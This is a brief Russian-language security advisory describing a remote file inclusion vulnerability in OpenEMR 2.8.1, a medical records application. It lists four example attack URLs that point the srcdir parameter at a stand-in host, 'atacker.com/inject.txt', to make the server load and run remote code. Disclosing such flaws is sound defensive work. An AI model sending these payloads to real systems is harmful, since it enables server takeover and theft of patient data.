Программа: OpenEMR 2.8.1
Уязвимость позволяет злоумышленнику выполнить произвольный сценарий на целевой системе. Уязвимость существует из-за ошибки в обработке входных данных различными сценариями. Атакующий может выполнить произвольный сценарий на целевой системе в контексте безопасности запущенного Web сервера.
Примеры:
http://target.com/[OpenEMR-path]/interface/billing/ billing_process.php?srcdir=http://atacker.com/inject.txt?
http://target.com/[OpenEMR-path]/interface/new/ new_patient_save.php?srcdir=http://atacker.com/inject.txt?
http://target.com/[OpenEMR-path]/login.php?srcdir =http://atacker.com/inject.txt?
http://target.com/[OpenEMR-path]/library/translation. inc.php?GLOBALS[srcdir]=http://atacker.com/inject.txt?
